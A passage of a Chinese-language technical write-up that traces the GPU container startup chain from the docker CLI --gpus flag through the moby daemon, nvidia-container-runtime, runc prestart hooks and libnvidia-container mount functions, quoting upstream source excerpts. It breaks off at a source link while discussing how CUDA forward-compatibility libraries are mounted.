Terminated Reason: Completed Exit Code: 0 Started: Thu, 28 Nov 2024 21:00:55 +0800 Finished: Thu, 28 Nov 2024 21:04:41 +0800 Ready: True Restart Count: 0 Environment: WITH_WAIT: true COMPONENT: driver OPERATOR_NAMESPACE: gpu-operator (v1:metadata.namespace) Mounts: /host from host-root (ro) /host-dev-char from host-dev-char (rw) /run/nvidia/driver from driver-install-dir (rw) /run/nvidia/validations from run-nvidia-validations (rw) /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)Containers: nvidia-container-toolkit-ctr: Container ID: containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615 Image: nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04 Image ID: nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb Port: <none> Host Port: <none> Command: /bin/bash -c Args: /bin/entrypoint.sh State: Running Started: Thu, 28 Nov 2024 21:04:54 +0800 Ready: True Restart Count: 0 Environment: ... Mounts: /bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh") /driver-root from driver-install-dir (rw) /host from host-root (ro) /run/nvidia/toolkit from toolkit-root (rw) /run/nvidia/validations from run-nvidia-validations (rw) /runtime/config-dir/ from containerd-config (rw) /runtime/sock-dir/ from containerd-socket (rw) /usr/local/nvidia from toolkit-install-dir (rw) /usr/share/containers/oci/hooks.d from crio-hooks (rw) /var/run/cdi from cdi-root (rw) /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)Conditions: ...Volumes: nvidia-container-toolkit-entrypoint: Type: ConfigMap (a volume populated by a ConfigMap) Name: nvidia-container-toolkit-entrypoint Optional: false toolkit-root: Type: HostPath (bare host directory volume) Path: /run/nvidia/toolkit HostPathType: DirectoryOrCreate run-nvidia-validations: Type: HostPath (bare host directory volume) Path: /run/nvidia/validations HostPathType: DirectoryOrCreate driver-install-dir: Type: HostPath (bare host directory volume) Path: /run/nvidia/driver HostPathType: DirectoryOrCreate host-root: Type: HostPath (bare host directory volume) Path: / HostPathType: toolkit-install-dir: Type: HostPath (bare host directory volume) Path: /usr/local/nvidia HostPathType: crio-hooks: Type: HostPath (bare host directory volume) Path: /run/containers/oci/hooks.d HostPathType: host-dev-char: Type: HostPath (bare host directory volume) Path: /dev/char HostPathType: cdi-root: Type: HostPath (bare host directory volume) Path: /var/run/cdi HostPathType: DirectoryOrCreate containerd-config: Type: HostPath (bare host directory volume) Path: /etc/containerd HostPathType: DirectoryOrCreate containerd-socket: Type: HostPath (bare host directory volume) Path: /run/containerd HostPathType: ...
在启动gpu容器前监听进程,验证发现仍通过 nvidia-container-toolkit 来实现。
root@wanglei-k8s-gpu-02862:~# while true; do ps -ef |grep nvidia-container-cli|grep -v grep; doneroot 91175 91173 0 21:04 ? 00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged
2. 调用链分析
-
nvidia-container-cli(https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli)
-
libnvidia-container(https://github.com/NVIDIA/libnvidia-container)
2.1 docker-cli –gpus 传递至 docker daemon
docker run 和 docker create 命令提供了 –gpus 参数,用于指定要传递给容器的 gpu 设备, 下面以 docker create
命令为例分析调用链。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79
func NewCreateCommand(dockerCli command.Cli) *cobra.Command { ... cmd := &cobra.Command{ Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", Short: "Create a new container", ... } ... copts = addFlags(flags) ...}
通过指定 –gpus
参数,设置到 hostConfig 中传递至 docker daemon 。
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190
func addFlags(flags *pflag.FlagSet) *containerOptions { copts := &containerOptions{ ... gpus opts.GpuOpts ... } ... flags.Var(&copts.gpus, "gpus", "GPU devices to add to the container ('all' to pass all GPUs)") ...}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593
func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) { ... deviceRequests := copts.gpus.Value()iflen(cdiDeviceNames) > 0 { cdiDeviceRequest := container.DeviceRequest{ Driver: "cdi", DeviceIDs: cdiDeviceNames, } deviceRequests = append(deviceRequests, cdiDeviceRequest) } resources := container.Resources{ ... DeviceRequests: deviceRequests, } ... hostConfig := &container.HostConfig{ ... Resources: resources, ... } ...return &containerConfig{ Config: config, HostConfig: hostConfig, NetworkingConfig: networkingConfig, }, nil}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120
func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error { ... containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType) ... id, err := createContainer(ctx, dockerCli, containerCfg, options) ...}func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) { ... response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name) ...}
2.2 docker daemon 创建 spec
在容器启动时,创建 spec,设置 prestart hook 配置。
https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error { ... return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)}func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) { ... spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts) ...}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) { ... opts = append(opts, ... WithDevices(daemon, c), ... ) ...}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938
func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts { return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error { ... for _, req := range c.HostConfig.DeviceRequests { if err := daemon.handleDevice(req, s); err != nil { return err } } ... }}
https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29
func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {if req.Driver == "" {for _, dd := range deviceDrivers { if selected := dd.capset.Match(req.Capabilities); selected != nil { return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected}) } } } elseif dd := deviceDrivers[req.Driver]; dd != nil {if req.Driver == "cdi" { return dd.updateSpec(spec, &deviceInstance{req: req}) }if selected := dd.capset.Match(req.Capabilities); selected != nil { return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected}) } }return incompatibleDeviceRequest{req.Driver, req.Capabilities}}
https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99
const nvidiaHook = "nvidia-container-runtime-hook"func init() {if _, err := exec.LookPath(nvidiaHook); err != nil {// do not register Nvidia driver if helper binary is not present.return } capset := capabilities.Set{"gpu": struct{}{}, "nvidia": struct{}{}} nvidiaDriver := &deviceDriver{ capset: capset, updateSpec: setNvidiaGPUs, }for c := range allNvidiaCaps { nvidiaDriver.capset[string(c)] = struct{}{} } registerDeviceDriver("nvidia", nvidiaDriver)}func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error { req := dev.reqif req.Count != 0 && len(req.DeviceIDs) > 0 {return errConflictCountDeviceIDs }iflen(req.DeviceIDs) > 0 { s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ",")) } elseif req.Count > 0 { s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count)) } elseif req.Count < 0 { s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all") }var nvidiaCaps []string// req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.for _, c := range dev.selectedCaps { nvcap := nvidia.Capability(c)if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap { nvidiaCaps = append(nvidiaCaps, c) continue }// TODO: nvidia.WithRequiredCUDAVersion// for now we let the prestart hook verify cuda versions but errors are not pretty. }if nvidiaCaps != nil { s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ",")) } path, err := exec.LookPath(nvidiaHook)if err != nil {return err }if s.Hooks == nil { s.Hooks = &specs.Hooks{} }// This implementation uses prestart hooks, which are deprecated.// CreateRuntime is the closest equivalent, and executed in the same// locations as prestart-hooks, but depending on what these hooks do,// possibly one of the other hooks could be used instead (such as// CreateContainer or StartContainer). s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one. Path: path, Args: []string{ nvidiaHook, "prestart", }, Env: os.Environ(), })returnnil}
docker 设置完 spec 后,将启动runtime。
2.3 nvidia-container-runtime 调用 runc
nvidia-container-toolkit 在安装时会将 runtime 设置为 nvidia-container-runtime。
nvidia-container-runtime 作为一层shim, 将会把docker传递过来的spec配置透传给更底层的runtime,通常默认是runc。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110
func GetDefault() (*Config, error) { d := Config{ ... NVIDIAContainerRuntimeConfig: RuntimeConfig{ ... Runtimes: []string{"docker-runc", "runc", "crun"}, ... }, ... } ...}
那么 nvidia-container-runtime 存在的意义是什么呢,主要是为了修改 spec,这实际上和 docker 前面修改的 prestart hooks 有一些冗余,不过 nvidia-container-runtime 会修改更多内容。
下面我们来跟踪完整的 nvidia-container-runtime 调用链。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11
func main() { r := runtime.New() err := r.Run(os.Args) if err != nil { os.Exit(1) }}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82
func (r rt) Run(argv []string) (rerr error) { ... runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver) ... return runtime.Exec(argv)}
-
如果执行的命令不是create,则直接调用 runc
-
如果执行create命令,则修改spec, 修改包括 modeModifier, graphicsModifier, featureModifie
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) { lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes) ...if !oci.HasCreateSubcommand(argv) { logger.Tracef("Skipping modifier for non-create subcommand")return lowLevelRuntime, nil } ociSpec, err := oci.NewSpec(logger, argv) ... specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver) ...// Create the wrapping runtime with the specified modifier. r := oci.NewModifyingRuntimeWrapper( logger, lowLevelRuntime, ociSpec, specModifier, )return r, nil}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56
func (r *modifyingRuntimeWrapper) Exec(args []string) error {if HasCreateSubcommand(args) { r.logger.Debugf("Create command detected; applying OCI specification modifications") err := r.modify()if err != nil { return fmt.Errorf("could not apply required modification to OCI specification: %w", err) } r.logger.Debugf("Applied required modification to OCI specification") } r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())return r.runtime.Exec(args)}
2.4 nvidia-container-runtime 具体会对 spec 修改什么
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66 7
// newSpecModifier is a factory method that creates constructs an OCI spec modifer based on the provided config.func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) { rawSpec, err := ociSpec.Load()if err != nil {returnnil, fmt.Errorf("failed to load OCI spec: %v", err) } image, err := image.NewCUDAImageFromSpec(rawSpec)if err != nil {returnnil, err } mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image) modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)if err != nil {returnnil, err }// For CDI mode we make no additional modifications.if mode == "cdi" {return modeModifier, nil } graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)if err != nil {returnnil, err } featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)if err != nil {returnnil, err } modifiers := modifier.Merge( modeModifier, graphicsModifier, featureModifier, )return modifiers, nil}
modeModifier 有3种。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105
func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {switch mode {case"legacy":return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nilcase"csv":return modifier.NewCSVModifier(logger, cfg, image)case"cdi":return modifier.NewCDIModifier(logger, cfg, ociSpec) }returnnil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)}
如果 mode 为 cdi, 则仅执行 modeModifier 。CDIModifiler 负责修改 spec中的hooks, devices,mounts 配置(这些配置已在/etc/cdi/nvidia.yaml
中声明)。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37
func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) { devices, err := getDevicesFromSpec(logger, ociSpec, cfg)if err != nil {returnnil, fmt.Errorf("failed to get required devices from OCI specification: %v", err) }iflen(devices) == 0 { logger.Debugf("No devices requested; no modification required.")returnnil, nil } logger.Debugf("Creating CDI modifier for devices: %v", devices) automaticDevices := filterAutomaticDevices(devices)iflen(automaticDevices) != len(devices) && len(automaticDevices) > 0 {returnnil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices") }iflen(automaticDevices) > 0 { automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)if err == nil { return automaticModifier, nil } logger.Warningf("Failed to create the automatic CDI modifier: %w", err) logger.Debugf("Falling back to the standard CDI modifier") }return cdi.New( cdi.WithLogger(logger), cdi.WithDevices(devices...), cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...), )}
LegacyModifier 会修改 runc prestart hook
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33
func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier { m := stableRuntimeModifier{ logger: logger, nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath, } return &m}
CSVModifier 支持通过csv文件主动提供设备的具体配置,与CDI模式类似,直接修改 oci spec 中的 devices 配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42
func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 { logger.Infof("No modification required; no devices requested")returnnil, nil } logger.Infof("Constructing modifier from config: %+v", *cfg)if err := checkRequirements(logger, image); err != nil {returnnil, fmt.Errorf("requirements not met: %v", err) } csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)if err != nil {returnnil, fmt.Errorf("failed to get list of CSV files: %v", err) }if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" { csvFiles = csv.BaseFilesOnly(csvFiles) } cdilib, err := nvcdi.New( nvcdi.WithLogger(logger), nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root), nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path), nvcdi.WithMode(nvcdi.ModeCSV), nvcdi.WithCSVFiles(csvFiles), )if err != nil {returnnil, fmt.Errorf("failed to construct CDI library: %v", err) } spec, err := cdilib.GetSpec()if err != nil {returnnil, fmt.Errorf("failed to get CDI spec: %v", err) } cdiModifier, err := cdi.New( cdi.WithLogger(logger), cdi.WithSpec(spec.Raw()), )if err != nil {returnnil, fmt.Errorf("failed to construct CDI modifier: %v", err) } modifiers := Merge( nvidiaContainerRuntimeHookRemover{logger}, cdiModifier, )return modifiers, nil}
GraphicsModifier
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32
func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {if required, reason := requiresGraphicsModifier(image); !required { logger.Infof("No graphics modifier required: %v", reason)returnnil, nil } nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path mounts, err := discover.NewGraphicsMountsDiscoverer( logger, driver, nvidiaCDIHookPath, )if err != nil {returnnil, fmt.Errorf("failed to create mounts discoverer: %v", err) }// In standard usage, the devRoot is the same as the driver.Root. devRoot := driver.Root drmNodes, err := discover.NewDRMNodesDiscoverer( logger, image.DevicesFromEnvvars(visibleDevicesEnvvar), devRoot, nvidiaCDIHookPath, )if err != nil {returnnil, fmt.Errorf("failed to construct discoverer: %v", err) } d := discover.Merge( drmNodes, mounts, )return NewModifierFromDiscoverer(logger, d)}
FeatureGatedModifier 根据配置中的开关,修改 oci中的设备和挂载配置。如启用相关特性,则新增对应的设备或挂载配置。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38
// NewFeatureGatedModifier creates the modifiers for optional features.// These include://// NVIDIA_GDS=enabled// NVIDIA_MOFED=enabled// NVIDIA_NVSWITCH=enabled// NVIDIA_GDRCOPY=enabled//// If not devices are selected, no changes are made.func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 { logger.Infof("No modification required; no devices requested")returnnil, nil }var discoverers []discover.Discover driverRoot := cfg.NVIDIAContainerCLIConfig.Root devRoot := cfg.NVIDIAContainerCLIConfig.Rootif cfg.Features.IsEnabled(config.FeatureGDS, image) { d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)if err != nil { returnnil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err) } discoverers = append(discoverers, d) }if cfg.Features.IsEnabled(config.FeatureMOFED, image) { d, err := discover.NewMOFEDDiscoverer(logger, devRoot)if err != nil { returnnil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err) } discoverers = append(discoverers, d) }if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) { d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)if err != nil { returnnil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err) } discoverers = append(discoverers, d) }if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) { d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)if err != nil { returnnil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err) } discoverers = append(discoverers, d) }return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))}
2.5 runc 在 prestart hook 阶段调用 nvidia-container-runtime-hook
https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462
func (p *initProcess) start() (retErr error) { ... ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {switch sync.Type {case procSeccomp: ...case procReady: ... if err := hooks[configs.Prestart].RunHooks(s); err != nil { return err } ...case procHooks: ... if err := hooks[configs.Prestart].RunHooks(s); err != nil { return err } ...default: ... } } ...}
2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179
func main() { ...switch args[0] {case"prestart": doPrestart() os.Exit(0)case"poststart":fallthroughcase"poststop": os.Exit(0)default: flag.Usage() os.Exit(2) }}
执行 nvidia-container-cli 的 configure 命令。
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149
func doPrestart() { ... args := []string{getCLIPath(cli)} ... args = append(args, "configure") ... err = syscall.Exec(args[0], args, env) ...}
2.7 nvidia-container-cli 调用 libnvidia-container
nvidia-container-cli 做了一个转换,把 libnvidia-container 中函数的 nvc_xxx 前缀移除了, 改为通过 libnvc.xxx 的形式调用。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140
intmain(int argc, char *argv[]){ ... if ((rv = load_libnvc()) != 0) goto fail; ...}
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137
intload_libnvc(void){ if (is_tegra() && !nvml_available()) return load_libnvc_v0(); return load_libnvc_v1();}...static intload_libnvc_v1(void){ #define load_libnvc_func(func) \ libnvc.func = nvc_##func load_libnvc_func(config_free); ...}
nvidia-container-cli configure 会执行很多 mount 操作。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433
intconfigure_command(const struct context *ctx){ ... if (libnvc.driver_mount(nvc, cnt, drv) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } for (size_t i = 0; i < devices.ngpus; ++i) { if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } } if (!mig_config_devices.all && !mig_monitor_devices.all) { for (size_t i = 0; i < devices.nmigs; ++i) { if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } } } if (mig_config_devices.all && mig_config_devices.ngpus) { if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } for (size_t i = 0; i < mig_config_devices.ngpus; ++i) { if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } } } if (mig_monitor_devices.all && mig_monitor_devices.ngpus) { if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) { if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } } } for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) { if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) { warnx("mount error: %s", libnvc.error(nvc)); goto fail; } } ... if (libnvc.ldcache_update(nvc, cnt) < 0) { warnx("ldcache error: %s", libnvc.error(nvc)); goto fail; } ...}
2.8 libnvidia-container nvc_driver_mount 函数挂载相关文件
nvc_driver_mount() 挂载:
– procfs: 将主机 /proc/driver/nvidia
下的相关文件挂载至容器内
-
app_profile: 将主机 /etc/nvidia/nvidia-application-profiles-rc.d
相关的配置文件挂载至容器内 -
Host binary and library: 将主机 二进制程序、依赖库 挂载至容器内
-
Container library mounts: 为了实现前向兼容,用户可以提供更新版本的cuda库,将容器/usr/local/cuda/compat目录下较新的CUDA库,挂载到容器 lib 目录。
-
Firmware: 将主机 /lib/firmware/nvidia
下的相关文件挂载至容器内 -
IPC: 将主机 /var/run/nvidia-persistenced/socket
下的相关文件挂载至容器内 -
Device: 将主机 /dev/nvidia-uvm
, /dev/nvidia-uvm-tools
下的相关文件挂载至容器内
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712
intnvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info){ ... if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0) return (-1); ... /* Procfs mount */ if (ctx->dxcore.initialized) log_warn("skipping procfs mount on WSL"); elseif ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL) goto fail; /* Application profile mount */ if (cnt->flags & OPT_GRAPHICS_LIBS) { if (ctx->dxcore.initialized) log_warn("skipping app profile mount on WSL"); elseif ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL) goto fail; } /* Host binary and library mounts */ if (info->bins != NULL && info->nbins > 0) { if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL) goto fail; ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); } if (info->libs != NULL && info->nlibs > 0) { if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL) goto fail; ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); } if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) { if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL) goto fail; ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); } if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0) goto fail; /* Container library mounts */ if (cnt->libs != NULL && cnt->nlibs > 0) { size_t nlibs = cnt->nlibs; char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs); if (libs == NULL) goto fail; filter_libraries(info, libs, &nlibs); if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) { free(libs); goto fail; } ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); free(libs); } /* Firmware mounts */ for (size_t i = 0; i < info->nfirmwares; ++i) { if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) { log_errf("error mounting firmware path %s", info->firmwares[i]); goto fail; } } /* IPC mounts */ for (size_t i = 0; i < info->nipcs; ++i) { /* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */ if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) || str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) { if (!(cnt->flags & OPT_UTILITY_LIBS)) continue; } elseif (!(cnt->flags & OPT_COMPUTE_LIBS)) continue; if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL) goto fail; } /* Device mounts */ for (size_t i = 0; i < info->ndevs; ++i) { /* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */ if (!ctx->dxcore.initialized) { /* XXX Only compute libraries require specific devices (e.g. UVM). */ if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR) continue; /* XXX Only display capability requires the modeset device. */ if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR) continue; } if (!(cnt->flags & OPT_NO_DEVBIND)) { if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL) goto fail; } if (!(cnt->flags & OPT_NO_CGROUPS)) { if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0) goto fail; } } rv = 0; fail: if (rv < 0) { for (size_t i = 0; mnt != NULL && i < nmnt; ++i) unmount(mnt[i]); assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS)); } else { rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS); } array_free((char **)mnt, nmnt); return (rv);}
2.9 挂载容器 cuda 库文件
重点分析从容器挂载到容器的操作,即cuda前向兼容特性。
根据收集到的容器内的cuda库文件cnt->libs
, 经 filter_libraries
过滤,挂载到容器内。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
intnvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info){ ... /* Container library mounts */ if (cnt->libs != NULL && cnt->nlibs > 0) { size_t nlibs = cnt->nlibs; char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs); if (libs == NULL) goto fail; filter_libraries(info, libs, &nlibs); if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) { free(libs); goto fail; } ptr = array_append(ptr, tmp, array_size(tmp)); free(tmp); free(libs); } ...}
其中 cnt->libs
为容器的/usr/local/cuda/compat/lib.so.
文件。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61
